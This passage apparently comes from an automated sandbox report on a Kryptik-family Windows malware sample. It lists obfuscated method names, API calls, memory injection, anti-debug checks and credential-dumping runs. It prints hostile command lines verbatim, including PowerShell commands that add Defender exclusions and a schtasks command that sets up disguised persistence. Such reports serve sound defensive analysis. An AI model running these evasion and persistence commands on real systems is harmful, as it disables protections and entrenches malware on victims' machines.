                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, jEORRnfif3v3h627MY.csHigh entropy of concatenated method names: 'vSSLMRHr64', 'msQLaJp8xH', 'z7aLkHuALv', 'K2vLY2xA0c', 'UKiLVGRYLr', 'QQykF6Yh5B', 'AROkcaXrE2', 'o1ikpP1dQD', 'dPkk38jcBQ', 'Q0bk4Hpf2D'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, c3ElsUsg35p7GQ8AoN.csHigh entropy of concatenated method names: 'Qiwv76oP5n', 'mYWvT2mLKa', 'Yntvf6yyF3', 'KPJvHRg4yY', 'klvvaem1Jg', 'ILevkN8iPx', 'HaFvLUyQ5g', 'rBKbpmGEXd', 'cK2b3onibN', 'oLEb4WitnE'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, QhBFofCVxaxcONJT4Z.csHigh entropy of concatenated method names: 'mifahPSjre', 'kg0aXfBmB9', 'zfYaPrSY27', 'XGbaCqAaZ3', 'q9CaFEWwAu', 'uTiacsmHJG', 'AZQapgAQmW', 'eYQa3OwpsQ', 'Ouua4DmZLa', 'H4maQER44j'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, PbFXXttaZcfdoJYktQ.csHigh entropy of concatenated method names: 'oxxbH7FIvr', 'o4cbaRX7cs', 'tWwbnDfLYs', 'kXXbk7td83', 'zg2bLqOnoT', 'aE6bYgvPNC', 'u0PbV97TiW', 'gEgbJOKEBe', 'exrb0aInKK', 'QZYbIEksYT'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, BLh0makLbVCyodwVhw.csHigh entropy of concatenated method names: 'tuwniu2lRy', 'B7unwbJtLT', 'TKinRXd4My', 'XlLnZb3JCq', 'HninmPpFVT', 'CsgnjrXI1Y', 'xWqnyLdjag', 'rNKnbK05G4', 'DHHnvL7pYx', 'gMmnGhBnCZ'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, vZx1jpD6tHD72wa9Ou.csHigh entropy of concatenated method names: 'JxGYlthK27', 'KUTY67JLqY', 'nJIYSbSlSa', 'P4HYiH9cJs', 'wD4YgHIvt2', 'cQ9YwjTMkA', 'rFmYDTQLwY', 'RSOYRcN5GR', 'SW2YZMSi09', 'mccY95XAtB'
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_00406EEB ShellExecuteW,URLDownloadToFileW | 15_2_00406EEB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | File created: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp"
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 15_2_0041AADB

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress | 15_2_0041CBE1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7356, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_0040F7E2 Sleep,ExitProcess,15_2_0040F7E2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Memory allocated: 2320000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Memory allocated: 24F0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Memory allocated: 44F0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Memory allocated: 8C00000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Memory allocated: 9C00000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Memory allocated: 9E20000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Memory allocated: AE20000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Memory allocated: B570000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Memory allocated: 31B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Memory allocated: 3310000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Memory allocated: 5310000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Memory allocated: 9630000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Memory allocated: A630000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Memory allocated: A840000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Memory allocated: B840000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Memory allocated: C220000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 10_2_05311230 rdtsc 10_2_05311230
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Code function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,15_2_0041A7D9
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8723
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 617
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7597
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 382
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Window / User API: threadDelayed 6500
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Window / User API: threadDelayed 2984
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Window / User API: foregroundWindowGot 1771
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe API coverage: 6.1 %
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe API coverage: 9.6 %
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe TID: 5416 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220 Thread sleep count: 8723 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316 Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200 Thread sleep count: 617 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7280 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe TID: 7344 Thread sleep count: 197 > 30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe TID: 7344 Thread sleep time: -98500s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe TID: 7348 Thread sleep count: 6500 > 30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe TID: 7348 Thread sleep time: -19500000s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe TID: 7348 Thread sleep count: 2984 > 30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe TID: 7348 Thread sleep time: -8952000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe TID: 7388 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Code function: 9_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_100010F1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Code function: 9_2_10006580 FindFirstFileExA,9_2_10006580
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_0040928E
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041C322
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040C388
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_004096A0
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_00408847
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_00407877 FindFirstFileW,FindNextFileW,15_2_00407877
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_0044E8F9 FindFirstFileExA,15_2_0044E8F9
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040BB6B
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00419B86
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040BD72
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Code function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,17_2_0040AE51
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Code function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Code function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,15_2_00407CD2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Code function: 17_2_00418981 memset,GetSystemInfo,17_2_00418981
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487991332.00000000011B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe API call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Code function: 9_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_100060E2
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041CBE1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Code function: 9_2_10004AB4 mov eax, dword ptr fs:[00000030h] 9_2_10004AB4
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_00443355 mov eax, dword ptr fs:[00000030h] 15_2_00443355
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Code function: 9_2_1000724E GetProcessHeap,9_2_1000724E
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Code function: 9_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_10002639
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Code function: 9_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10002B1C
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_0043503C
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00434A8A
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0043BB71
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_00434BD8 SetUnhandledExceptionFilter,15_2_00434BD8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Memory written: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Memory written: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Section loaded: NULL target: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe protection: execute and read and write
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 15_2_00412132
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: 15_2_00419662 mouse_event,15_2_00419662
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\vkwehamdpyfugcryqteiojtur"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\xmcxhkxfdgxhrrnkzezbznfdacwy"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\ighpidhzropmtxboqpldcaaujighwuh"
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp9E3E.tmp"
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Process created: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerXH\i
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001196000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerXH\C%
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerFilesCl@-P
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerXH\
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerXH\t
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001176000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
